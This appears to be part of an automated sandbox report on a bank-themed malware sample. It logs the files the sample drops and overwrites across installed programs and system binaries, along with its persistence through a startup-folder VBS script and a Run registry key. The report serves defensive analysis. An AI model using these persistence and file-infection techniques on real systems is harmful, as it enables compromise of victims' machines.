Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 520192	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\Temp\unnervousness offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Users\user\AppData\Local\differences\niellist.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
